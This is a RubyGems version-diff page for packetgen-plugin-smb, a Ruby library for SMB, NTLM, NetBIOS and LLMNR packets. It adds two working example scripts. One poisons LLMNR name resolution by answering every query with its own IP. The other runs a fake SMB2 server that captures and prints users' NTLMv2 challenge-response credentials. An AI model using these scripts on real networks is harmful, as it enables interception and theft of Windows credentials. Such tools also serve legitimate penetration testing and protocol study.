RubyGems - packetgen-plugin-smb - Versions diffs - 0.3.0 → 0.6.2 - Mend

packetgen-plugin-smb 0.3.0 → 0.6.2

Files changed (57) hide show

checksums.yaml +4 -4
data/.github/workflows/specs.yml +28 -0
data/.rubocop.yml +8 -1
data/Gemfile +15 -3
data/README.md +59 -3
data/Rakefile +10 -4
data/examples/llmnr-responder +110 -0
data/examples/smb-responder +233 -0
data/lib/packetgen-plugin-smb.rb +5 -2
data/lib/packetgen/plugin/gssapi.rb +11 -6
data/lib/packetgen/plugin/llmnr.rb +58 -0
data/lib/packetgen/plugin/netbios.rb +19 -0
data/lib/packetgen/plugin/netbios/datagram.rb +108 -0
data/lib/packetgen/plugin/netbios/name.rb +64 -0
data/lib/packetgen/plugin/netbios/session.rb +72 -0
data/lib/packetgen/plugin/ntlm.rb +211 -0
data/lib/packetgen/plugin/ntlm/authenticate.rb +197 -0
data/lib/packetgen/plugin/ntlm/av_pair.rb +115 -0
data/lib/packetgen/plugin/ntlm/challenge.rb +140 -0
data/lib/packetgen/plugin/ntlm/negotiate.rb +127 -0
data/lib/packetgen/plugin/ntlm/ntlmv2_response.rb +59 -0
data/lib/packetgen/plugin/smb.rb +27 -15
data/lib/packetgen/plugin/smb/blocks.rb +2 -4
data/lib/packetgen/plugin/smb/browser.rb +8 -8
data/lib/packetgen/plugin/smb/browser/domain_announcement.rb +2 -7
data/lib/packetgen/plugin/smb/browser/host_announcement.rb +10 -7
data/lib/packetgen/plugin/smb/browser/local_master_announcement.rb +2 -7
data/lib/packetgen/plugin/smb/close.rb +2 -2
data/lib/packetgen/plugin/smb/close/request.rb +3 -3
data/lib/packetgen/plugin/smb/close/response.rb +3 -3
data/lib/packetgen/plugin/smb/filetime.rb +30 -3
data/lib/packetgen/plugin/smb/negotiate.rb +20 -0
data/lib/packetgen/plugin/smb/negotiate/dialect.rb +39 -0
data/lib/packetgen/plugin/smb/negotiate/request.rb +35 -0
data/lib/packetgen/plugin/smb/negotiate/response.rb +29 -0
data/lib/packetgen/plugin/smb/nt_create_and_x.rb +2 -2
data/lib/packetgen/plugin/smb/ntcreateandx/request.rb +5 -5
data/lib/packetgen/plugin/smb/ntcreateandx/response.rb +3 -3
data/lib/packetgen/plugin/smb/string.rb +60 -23
data/lib/packetgen/plugin/smb/trans.rb +2 -2
data/lib/packetgen/plugin/smb/trans/request.rb +4 -4
data/lib/packetgen/plugin/smb/trans/response.rb +3 -3
data/lib/packetgen/plugin/smb2.rb +20 -9
data/lib/packetgen/plugin/smb2/base.rb +5 -7
data/lib/packetgen/plugin/smb2/error.rb +3 -4
data/lib/packetgen/plugin/smb2/guid.rb +6 -4
data/lib/packetgen/plugin/smb2/negotiate.rb +2 -2
data/lib/packetgen/plugin/smb2/negotiate/context.rb +28 -27
data/lib/packetgen/plugin/smb2/negotiate/request.rb +16 -12
data/lib/packetgen/plugin/smb2/negotiate/response.rb +25 -14
data/lib/packetgen/plugin/smb2/session_setup.rb +2 -2
data/lib/packetgen/plugin/smb2/session_setup/request.rb +12 -7
data/lib/packetgen/plugin/smb2/session_setup/response.rb +13 -8
data/lib/packetgen/plugin/smb_version.rb +3 -1
data/packetgen-plugin-smb.gemspec +10 -15
metadata +28 -81
data/.travis.yml +0 -12

checksums.yaml CHANGED

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: cc233d3dcb94925757db9c4f5dde9647f97cce4d1e73001f3bbbcb41309ed435
-  data.tar.gz: 50d2ebf353a37d073bae3f6f7458057e4db8a7f2b5c0932094e1820056ab2746
+  metadata.gz: 4b63382e5580528b23ba059cd370db53203efec6cd6273388f88b15976b9343d
+  data.tar.gz: 425f63395bdc0c38e1288f0690fd8cc51c944645b5fc017e2c6289ba9c54b78d
 SHA512:
-  metadata.gz: 5862b573e7b9bba3826f10ef8e1ac8bbb34817e49f93338223ca5fbfcd0ad19cbeb65b64428fc1832c7603fe8a5a5cfc32cb6ac31d63c2e66de4a518ab89de6d
-  data.tar.gz: bb9a3e27eb4c36e3b6197d6450bef4efd73af1e3a0849c07383ea32924d155e0e21f975f7c91b4092ba70cce3d03cb368f92d38311a1a6585c946b5c1462dae5
+  metadata.gz: '08a4a6e817ff3ae8c7c341c6af64722fcdf09331767627adf04c36a6f442dcc6ea7dfb21cd76f2ec3c1f9818b5b3e565806b5391d041130c189de9fc89eacaf6'
+  data.tar.gz: b537ad94930b18a5ab93a219a66090384c84f0cfae44426b42304732c0f31e41c9903e9cf8eb41778e82661eb5803d33cdca640104b7a0e5db37df2497320af9

data/.github/workflows/specs.yml ADDED

@@ -0,0 +1,28 @@
+name: Specs
+on:
+  push:
+    branches: [ master ]
+  pull_request:
+    branches: [ master ]
+jobs:
+  test:
+    strategy:
+      fail-fast: false
+      matrix:
+        os: [ubuntu-latest]
+        ruby: [2.4, 2.5, 2.6, 2.7]
+    runs-on: ${{ matrix.os }}
+    steps:
+    - uses: actions/checkout@v2
+    - name: Install dependencies
+      run: sudo apt-get update -qq && sudo apt-get install libpcap-dev -qq
+    - name: Set up Ruby
+      uses: ruby/setup-ruby@v1
+      with:
+        ruby-version: ${{ matrix.ruby }}
+    - name: Run tests
+      run: |
+        bundle config set path 'vendor/bundle'
+        bundle config set --local without noci
+        bundle install
+        bundle exec rake

data/.rubocop.yml CHANGED

@@ -1,4 +1,7 @@
-TargetRubyVersion: 2.3
+require:
+  - rubocop-performance
+Layout/LineLength:
+  Max: 150
 Layout/SpaceAroundEqualsInParameterDefault:
   EnforcedStyle: no_space
 Lint/EmptyWhen:
@@ -7,8 +10,12 @@ Lint/Void:
   Enabled: false
 Metrics:
   Enabled: false
+Style/AccessModifierDeclarations:
+  Enabled: false
 Style/AsciiComments:
   Enabled: false
+Style/ClassAndModuleChildren:
+  Enabled: false
 Style/Encoding:
   Enabled: false
 Style/EvalWithLocation:

data/Gemfile CHANGED

@@ -1,6 +1,18 @@
-source 'https://rubygems.org'
+# frozen_string_literal: true
-git_source(:github) {|repo_name| "https://github.com/#{repo_name}" }
+source 'https://rubygems.org'
-# Specify your gem's dependencies in packetgen-plugin-smb.gemspec
 gemspec
+gem 'bundler', '>=1.17', '<3'
+gem 'rake', '~> 12.3'
+gem 'rspec', '~> 3.10'
+group :noci do
+  gem 'debase', '~>0.2'
+  gem 'rubocop', '~> 1.6.0'
+  gem 'rubocop-performance', '~> 1.9'
+  gem 'ruby-debug-ide', '~> 0.7'
+  gem 'simplecov', '~> 0.18'
+  gem 'yard', '~> 0.9'
+end

data/README.md CHANGED

@@ -1,9 +1,26 @@
 [![Gem Version](https://badge.fury.io/rb/packetgen-plugin-smb.svg)](https://badge.fury.io/rb/packetgen-plugin-smb)
-[![Build Status](https://travis-ci.com/sdaubert/packetgen-plugin-smb.svg?branch=master)](https://travis-ci.com/sdaubert/packetgen-plugin-smb)
 # Packetgen::Plugin::SMB
-This is a plugin for [PacketGen gem](https://github.com/sdaubert/packetgen). It adds some support for SMB protocol suite.
+This is a plugin for [PacketGen gem](https://github.com/sdaubert/packetgen). It adds some support for SMB protocol suite:
+* NetBIOS:
+  * Datagram service,
+  * Session service,
+* SMB:
+  * SMB common header,
+  * Negotiate command,
+  * Close command,
+  * NtCreateAndX command,
+  * Trans command,
+  * Browser subprotocol,
+* SMB2:
+  * SMB2 common header (support 2.x and 3.x dialects),
+  * Negotiate command,
+  * SessionSetup command,
+* GSSAPI, used to transport negotiation over SMB2 commands,
+* NTLM, SMB authentication protocol,
+* LLMNR (_Link-Local Multicast Name Resolution_), resolution protocol used in SMB networks.
 ## Installation
@@ -23,7 +40,46 @@ Or install it yourself as:
 ## Usage
-TODO
+### SMB2 with NTLM negociation
+See [examples/smb-responder](/examples/smb-responder).
+### LLMNR
+LLMNR is a multicast protocol. Unless you want to have a fine control on UDP layer, the simplest way is to use it over a UDP ruby socket:
+```ruby
+require 'socket'
+require 'packetgen'
+require 'packetgen-plugin-smb'
+LLMNR_MCAST_ADDR = '224.0.0.252'
+LOCAL_IPADDR = 'x.x.x.x' # your IP
+# Open a UDP socket
+socket = UDPSocket.new
+# Bind it to receive LLMNR response packets
+socket.bind(LOCAL_IPADDR, 0)
+# Send a LLMNR query
+query = PacketGen.gen('LLMNR', id: 0x1234, opcode: 'query')
+query.llmnr.qd << { rtype: 'Question', name: 'example.local' }
+socket.send(query.to_s, 0, LLMNR_MCAST_ADDR, PacketGen::Plugin::LLMNR::UDP_PORT)
+# Get answer
+# data = socket.recv(1024)
+data, peer = socket.recvfrom(1024)
+answer = PacketGen.parse(data, first_header: 'LLMNR')
+example_local_ip = answer.llmnr.an.to_a
+                         .find { |an| an.is_a?(PacketGen::Header::DNS::RR) }.human_rdata
+puts example_local_ip
+```
+You have to manage multicast if you want to make a LLMNR responder. For further details, see [examples/llmnr-responder](/examples/llmnr-responder).
+## See also
+API documentation: http://www.rubydoc.info/gems/packetgen-plugin-smb
 ## License

data/Rakefile CHANGED

@@ -1,13 +1,19 @@
+# frozen_string_literal: true
 require 'bundler/gem_tasks'
 require 'rspec/core/rake_task'
-require 'yard'
 task default: :spec
 RSpec::Core::RakeTask.new
-YARD::Rake::YardocTask.new do |t|
-  t.options = ['--no-private']
-  t.files = ['lib/**/*.rb', '-', 'LICENSE']
+begin
+  require 'yard'
+  YARD::Rake::YardocTask.new do |t|
+    t.options = ['--no-private']
+    t.files = ['lib/**/*.rb', '-', 'LICENSE']
+  end
+rescue LoadError
+  # no yard, so no yard task
 end

data/examples/llmnr-responder ADDED

@@ -0,0 +1,110 @@
+#!/usr/bin/env ruby
+# This file is part of packetgen-plugin-smb.
+# See https://github.com/sdaubert/packetgen-plugin-smb for more informations
+# Copyright (C) 2018 Sylvain Daubert <sylvain.daubert@laposte.net>
+# This program is published under MIT license.
+#
+# This small example implements a LLMNR responder. It responds to all LLMNR
+# requests on local network, and says requested name is its IP address.
+# frozen_string_literal: true
+require 'optparse'
+require 'socket'
+require 'ipaddr'
+require 'packetgen'
+require 'packetgen-plugin-smb'
+BIND_ADDR = '0.0.0.0'
+class LlmnrResponder
+  attr_reader :socket, :my_ip, :my_ip_data
+  LLMNR_MCAST_ADDR = '224.0.0.252'
+  def initialize
+    @socket = UDPSocket.new
+  end
+  def start(bind_addr:, iface:)
+    @my_ip = Interfacez.ipv4_address_of(iface)
+    @my_ip_data = IPAddr.new(my_ip).hton
+    configure_multicast(my_ip_data)
+    socket.bind(bind_addr, PacketGen::Plugin::LLMNR::UDP_PORT)
+    start_loop
+  end
+  private
+  def log(str)
+    puts "[LLMNR] #{str}"
+  end
+  def configure_multicast(local_ip_bin)
+    mreq = IPAddr.new(LLMNR_MCAST_ADDR).hton + local_ip_bin
+    socket.setsockopt(:IPPROTO_IP, :IP_ADD_MEMBERSHIP, mreq)
+  end
+  def start_loop
+    loop do
+      data, peer = socket.recvfrom(1024)
+      pkt = PacketGen.parse(data, first_header: 'LLMNR')
+      next unless pkt.is?('LLMNR')
+      peer_port = peer[1]
+      peer_ip = peer[3]
+      log "received LLMNR request from #{peer_ip}"
+      # Forge LLMNR response
+      response_pkt = pkt.reply
+      response_pkt.llmnr.qr = true
+      response_pkt.llmnr.qd.each do |question|
+        next unless (question.human_rrclass == 'IN') && (question.human_type == 'A')
+        log "Say to #{peer_ip} #{question.name} is #{my_ip}"
+        answer = { rtype: 'RR', name: question.name, rdata: my_ip_data }
+        response_pkt.llmnr.an << answer
+      end
+      response_pkt.calc
+      next unless response_pkt.llmnr.ancount > 0
+      socket.send(response_pkt.to_s, 0, peer_ip, peer_port)
+    end
+  end
+end
+def parse_options
+  options = {}
+  OptionParser.new do |opts|
+    opts.banner = "Usage: #{$PROGRAM_NAME} [options]"
+    opts.separator ''
+    opts.separator 'Options:'
+    opts.on_tail('-h', '--help', 'Show this message') do
+      puts opts
+      exit
+    end
+    opts.on('-i IFACE', '--interface IFACE', 'interface on which responds') do |iface|
+      options[:iface] = iface
+    end
+  end.parse!
+  options
+end
+def check_options(options)
+  raise 'No interface given' if options[:iface].nil?
+  raise "unknown interface #{options[:iface]}" unless Interfacez.all.include? options[:iface]
+end
+options = parse_options
+check_options options
+LlmnrResponder.new.start(bind_addr: BIND_ADDR, iface: options[:iface])

data/examples/smb-responder ADDED

@@ -0,0 +1,233 @@
+#!/usr/bin/env ruby
+# This file is part of packetgen-plugin-smb.
+# See https://github.com/sdaubert/packetgen-plugin-smb for more informations
+# Copyright (C) 2018 Sylvain Daubert <sylvain.daubert@laposte.net>
+# This program is published under MIT license.
+#
+# This small example implements a SMB responder. It responds to all SMB
+# Negotiate request to capture credentials.
+# Before running it (as root), llmnr-responder should be running.
+# frozen_string_literal: true
+require 'socket'
+require 'securerandom'
+require 'ostruct'
+require 'packetgen'
+require 'packetgen-plugin-smb'
+BIND_ADDR = '0.0.0.0'
+DOMAIN_NAME = 'SMB3'
+COMPUTER_NAME = 'WIN-AZE546CFHTD'
+Thread.abort_on_exception = true
+Credentials = Struct.new(:user, :computer, :challenge, :proof, :response, :ip) do
+  def to_s
+    user = self.user.encode('UTF-8')
+    computer = self.computer.encode('UTF-8')
+    str = +"User: #{user}\nComputer:#{computer} (IP: #{ip})\n"
+    str << "Challenge: #{challenge}\nProof: #{proof}\n"
+    str << "Response: #{response}"
+  end
+end
+class Smb2Responder
+  attr_reader :socket, :guid, :salt
+  NTLMSSP_OID = '1.3.6.1.4.1.311.2.2.10'
+  STATUS_MORE_PROCESSING_REQUIRED = 0xc0000016
+  STATUS_ACCESS_DENIED = 0xc0000022
+  SMB2_SIZE = 8_388_608
+  SMB2_NEGO_RESP_BUFFER = "`\x82\x01<\x06\x06+\x06\x01\x05\x05\x02\xA0\x82\x0100\x82\x01,\xA0\x1A0\x18\x06\n+\x06\x01\x04\x01\x827\x02\x02\x1E\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xA2\x82\x01\f\x04\x82\x01\bNEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x00C%\xB9`\x18\xCE\xC8\xA9\xB7\xB7W\x9B\xC1J\xF5\xC0\x7F\x15\x93\x15k\xE5\x88\n\x9A\\\x9A\xD6\x9EK`\x81\a\xEF\xF7f\xF6\x80\xAA\x17\xE0\xC2\xC5\xE5\xDB\x05\\\v\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xEA\xF9\rM\xB2\xECJ\xE3xn\xC3\bNEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x00C%\xB9`\x18\xCE\xC8\xA9\xB7\xB7W\x9B\xC1J\xF5\xC0\\3S\r\xEA\xF9\rM\xB2\xECJ\xE3xn\xC3\b@\x00\x00\x00X\x00\x00\x000V\xA0T0R0'\x80%0#1!0\x1F\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1F\x06\x03U\x04\x03\x13\x18Token Signing Public Key"
+  SMB2_SALT_LEN = 32
+  def initialize
+    @guid = SecureRandom.uuid
+    @salt = SecureRandom.random_bytes(SMB2_SALT_LEN)
+  end
+  def start(bind_addr:)
+    @socket = TCPServer.new(bind_addr, PacketGen::Plugin::NetBIOS::Session::TCP_PORT2)
+    start_loop
+  end
+  private
+  def log(str)
+    puts "[SMB2] #{str}"
+  end
+  def get_smb_data(sock)
+    PacketGen.parse(sock.recv(1024), first_header: 'NetBIOS::Session')
+  end
+  def smb2_nego_resp1
+    return @resp1_pkt if defined? @resp1_pkt
+    @resp1_pkt = PacketGen.gen('NetBIOS::Session')
+                          .add('SMB2', credit: 1)
+                          .add('SMB2::Negotiate::Response',
+                               dialect: 0x2ff,
+                               server_guid: guid, capabilities: 7,
+                               max_trans_size: SMB2_SIZE,
+                               max_read_size: SMB2_SIZE,
+                               max_write_size: SMB2_SIZE)
+    @resp1_pkt.smb2_negotiate_response[:buffer] = PacketGen::Types::String.new.read(SMB2_NEGO_RESP_BUFFER)
+    @resp1_pkt.calc
+    @resp1_pkt
+  end
+  def first_nego_response
+    pkt = smb2_nego_resp1
+    pkt.smb2_negotiate_response[:system_time] = PacketGen::Plugin::SMB::Filetime.now
+    pkt
+  end
+  def second_nego_response(req_pkt)
+    smb2_req = req_pkt.smb2
+    nego_req = req_pkt.smb2_negotiate_request
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit: 1,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::Negotiate::Response',
+                        dialect: nego_req.dialects.last,
+                        server_guid: guid,
+                        capabilities: 0x2f,
+                        max_trans_size: SMB2_SIZE,
+                        max_read_size: SMB2_SIZE,
+                        max_write_size: SMB2_SIZE,
+                        system_time: PacketGen::Plugin::SMB::Filetime.now,
+                        buffer: PacketGen::Types::String.new.read(SMB2_NEGO_RESP_BUFFER))
+    pkt.smb2_negotiate_response.context_list << { type: 1, salt_length: SMB2_SALT_LEN, salt: salt }
+    pkt.smb2_negotiate_response.context_list.last.hash_alg << PacketGen::Types::Int16le.new(1)
+    pkt.smb2_negotiate_response.context_list << { type: 2 }
+    pkt.smb2_negotiate_response.context_list.last.ciphers << PacketGen::Types::Int16le.new(1)
+    pkt.calc
+    pkt
+  end
+  def first_session_setup_response(req_pkt)
+    smb2_req = req_pkt.smb2
+    setup_req = req_pkt.smb2_sessionsetup_request
+    ntlm_nego = PacketGen::Plugin::NTLM.read(setup_req.buffer[:token_init][:mech_token].value)
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit_charge: 1,
+                        credit: 1,
+                        status: STATUS_MORE_PROCESSING_REQUIRED,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::SessionSetup::Response')
+    ntlm = PacketGen::Plugin::NTLM::Challenge.new
+    ntlm.flags = ntlm_nego.flags | 0x00810000
+    ntlm.flags &= 0xfdffff15
+    ntlm.challenge = [rand(2**64)].pack('q<')
+    ntlm.target_name.read('SMB3')
+    ntlm.target_info << { type: 'DomainName', value: DOMAIN_NAME }
+    ntlm.target_info << { type: 'ComputerName', value: COMPUTER_NAME }
+    ntlm.target_info << { type: 'DnsDomainName', value: "#{DOMAIN_NAME}.local" }
+    ntlm.target_info << { type: 'DnsComputerName', value: "#{COMPUTER_NAME}.local" }
+    ntlm.target_info << { type: 'DnsTreeName', value: "#{DOMAIN_NAME}.local" }
+    ntlm.target_info << { type: 'Timestamp', value: PacketGen::Plugin::SMB::Filetime.now.to_human }
+    ntlm.target_info << { type: 'EOL' }
+    ntlm.calc_length
+    gssapi = pkt.smb2_sessionsetup_response.buffer
+    gssapi[:token_resp][:response].value = ntlm.to_s
+    gssapi[:token_resp][:negstate].value = 'accept-incomplete'
+    gssapi[:token_resp][:supported_mech] = NTLMSSP_OID
+    pkt.calc
+    [pkt, ntlm.challenge]
+  end
+  def deny_access(req_pkt)
+    smb2_req = req_pkt.smb2
+    pkt = PacketGen.gen('NetBIOS::Session')
+                   .add('SMB2',
+                        credit: 1,
+                        credit_charge: 1,
+                        status: STATUS_ACCESS_DENIED,
+                        message_id: smb2_req.message_id,
+                        reserved: smb2_req.reserved)
+                   .add('SMB2::SessionSetup::Response')
+    # Remove buffer
+    pkt.smb2_sessionsetup_response[:buffer] = PacketGen::Types::String.new
+    pkt.calc
+    pkt
+  end
+  def start_loop
+    loop do
+      client = socket.accept
+      to_close = false
+      log "connection from #{client.peeraddr[2]}"
+      credentials = Credentials.new
+      credentials.ip = client.peeraddr.last
+      until to_close
+        rcv_pkt = get_smb_data(client)
+        pkt_to_send = case rcv_pkt.headers.last.protocol_name
+                      when 'SMB::Negotiate::Request'
+                        unless rcv_pkt.smb_negotiate_request.dialects.map(&:to_human).include?('SMB 2.???')
+                          to_close = true
+                          nil
+                        end
+                        first_nego_response
+                      when 'SMB2::Negotiate::Request'
+                        second_nego_response rcv_pkt
+                      when 'SMB2::SessionSetup::Request'
+                        gssapi = rcv_pkt.smb2_sessionsetup_request.buffer
+                        if gssapi[:token_init][:mech_types].value.map(&:value).include?(NTLMSSP_OID)
+                          pkt, challenge = first_session_setup_response(rcv_pkt)
+                          credentials.challenge = binary2hex(challenge)
+                          pkt
+                        else
+                          response = PacketGen::Plugin::NTLM.read(gssapi[:token_resp][:response].value)
+                          if response.is_a?(PacketGen::Plugin::NTLM::Authenticate)
+                            credentials.proof = binary2hex(response.nt_response.response)
+                            credentials.user = response.user_name
+                            credentials.computer = response.workstation
+                            credentials.response = binary2hex(response.nt_response.to_s[response.nt_response[:response].sz..-5])
+                            to_close = true
+                            deny_access rcv_pkt
+                          else
+                            to_close = true
+                            nil
+                          end
+                        end
+                      end
+        client.send(pkt_to_send.to_s, 0) if pkt_to_send
+        client.close if to_close
+        puts credentials.to_s unless credentials.response.nil?
+      end
+    end
+  end
+  def binary2hex(str)
+    str.unpack('H*').first
+  end
+end
+Smb2Responder.new.start(bind_addr: BIND_ADDR)